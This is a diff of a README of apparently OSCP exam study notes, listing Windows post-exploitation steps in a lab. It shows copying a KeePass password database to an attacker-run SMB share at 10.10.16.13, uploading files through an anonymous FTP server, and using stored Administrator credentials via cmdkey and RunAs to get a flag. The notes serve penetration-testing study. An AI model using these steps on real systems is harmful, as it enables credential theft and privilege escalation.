AbdullahZuhair21/OSCP-Notes/README.md

 ls -la is equal to dir /R in windows
 -     more < raman.txt:hidden.txt

-Copy a file from windows to Linux by setting up smb server setup the smbserver
+Copy a file from Windows to Linux by setting up SMB server setup a smbserver
 -     impacket-smbserver raman `pwd` cd to the share
 -     cd \\10.10.16.13\raman
 -     cp c:\users\raman\raman.kdbx .
+setup an FTP server
+-     python -m pyftpdlib -p 21 --write    (pip3 install pyftpdlib  #to download it) (kali) head to C:\Tools\Source and connect to the kali FTP server, anonymous login, then put the windows_service.c file
+-     ftp 10.10.16.4
+-     username:anonymous
+-     put windows_service.c

 5- Get System

 6- RunAs
+run the following command to check next two lines information
 -     cmdkey /list
 if you find Target: Domain:interactive=Access\Administrator Type: Domain Password User: Access\Administrator use RunAs command to get the flag